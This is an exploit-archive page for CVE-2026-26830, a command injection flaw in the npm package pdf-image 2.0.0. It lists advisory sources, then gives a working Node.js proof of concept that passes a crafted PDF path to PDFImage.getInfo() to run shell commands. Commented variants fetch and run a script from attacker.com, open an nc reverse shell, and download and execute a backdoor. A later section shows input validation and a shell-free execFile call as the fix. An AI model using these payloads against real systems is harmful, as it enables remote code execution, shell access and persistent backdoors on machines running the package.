| Title | Published | Views | Reporter |
|---|---|---|---|
| Exploit for CVE-2026-26830 | 24 Mar 2026 16:15 | – | githubexploit |
| CVE-2026-26830 | 25 Mar 2026 00:00 | – | attackerkb |
| CVE-2026-26830 | 25 Mar 2026 17:08 | – | circl |
| pdf-image security vulnerability | 25 Mar 2026 00:00 | – | cnnvd |
| CVE-2026-26830 | 25 Mar 2026 00:00 | – | cve |
| CVE-2026-26830 | 25 Mar 2026 00:00 | – | cvelist |
| EUVD-2026-15457 | 25 Mar 2026 15:31 | – | euvd |
| pdf-image has an OS Command Injection Vulnerability through its pdfFilePath parameter | 25 Mar 2026 15:31 | – | github |
| CVE-2026-26830 | 25 Mar 2026 15:16 | – | nvd |
| GHSA-Q5MH-72XG-628W pdf-image has an OS Command Injection Vulnerability through its pdfFilePath parameter | 25 Mar 2026 15:31 | – | osv |

==================================================================================================================================
| # Title : pdf-image 2.0.0 OS Command Injection via Unescaped PDF Path in PDFImage.getInfo() |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://www.npmjs.com/package/pdf-image |
==================================================================================================================================
[+] Summary : In pdf-image version 2.0.0, a security issue allows OS command injection when untrusted input is passed to the PDFImage constructor and later processed by methods such as getInfo().
[+] POC :
// exploit.js
const { PDFImage } = require("pdf-image");

const maliciousPdfPath = 'test.pdf"; touch /tmp/pwned.txt; echo "';
// const maliciousPdfPath = 'test.pdf"; curl http://attacker.com/shell.sh | bash; echo "';
// const maliciousPdfPath = 'test.pdf"; nc -e /bin/sh attacker.com 4444; echo "';
// const maliciousPdfPath = 'test.pdf"; wget http://attacker.com/backdoor -O /tmp/backdoor && chmod +x /tmp/backdoor && /tmp/backdoor; echo "';

console.log("[+] CVE-2026-26830 - PDFImage OS Command Injection Exploit");
console.log("[+] Malicious PDF path:", maliciousPdfPath);
console.log("[+] Creating PDFImage instance...");
const pdfImage = new PDFImage(maliciousPdfPath);

console.log("[+] Calling getInfo() to trigger the vulnerability...");
pdfImage.getInfo()
  .then((info) => {
    console.log("[!] getInfo() succeeded unexpectedly (injection might still have worked)");
    console.log("Info:", info);
  })
  .catch((err) => {
    console.log("[!] getInfo() failed (but command may have executed before the error)");
    console.log("Error:", err.message);
  })
  .finally(() => {
    console.log("[*] Check if the command executed by running: cat /tmp/pwned.txt");
    console.log("[*] If the file exists, the exploit was successful!");
  });
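
A defensive counterpart to the PoC above, added here as an example (it is not pdf-image's code and not the author's): it shows why a double quote in the path breaks out of the command, and one way for a calling application to validate the name and run the tool without a shell. Assumptions: the quoted shell-string shape is inferred from the PoC's payload, the metadata tool is `pdfinfo` on PATH, and `shellStringFor`, `resolvePdfPath`, `getInfoSafe` and the upload directory are hypothetical names.

```javascript
// Added example, not pdf-image's code. Names and paths here are hypothetical.
const { execFile } = require("child_process");
const path = require("path");

// Assumed shape of the vulnerable call, inferred from the PoC's quoting:
// the caller's path is pasted between double quotes in a string that a
// shell later parses, so a '"' in the path ends the quoted argument.
function shellStringFor(pdfPath) {
  return `pdfinfo "${pdfPath}"`;
}

// Allowlist for upload names: one path component, conservative characters.
const SAFE_NAME = /^[A-Za-z0-9._-]+\.pdf$/;

// Map an untrusted name to an absolute path inside baseDir, or throw.
function resolvePdfPath(baseDir, name) {
  if (typeof name !== "string" || !SAFE_NAME.test(name)) {
    throw new Error("rejected PDF name");
  }
  const root = path.resolve(baseDir);
  const full = path.resolve(root, name);
  // Defence in depth: the result must be a direct child of baseDir.
  if (path.dirname(full) !== root) {
    throw new Error("path escapes base directory");
  }
  return full;
}

// Hardened call: execFile passes argv straight to the program with no
// shell, so quotes and semicolons in an argument are never interpreted.
// The absolute path also cannot be mistaken for a command-line option.
function getInfoSafe(baseDir, name) {
  const full = resolvePdfPath(baseDir, name); // throws before any spawn
  return new Promise((resolve, reject) => {
    execFile("pdfinfo", [full], { timeout: 10000 }, (err, stdout) =>
      err ? reject(err) : resolve(stdout)
    );
  });
}
```

Until a fixed release of the package is available, the same validation applied to any value that reaches the `PDFImage` constructor keeps shell metacharacters out of the path.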
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================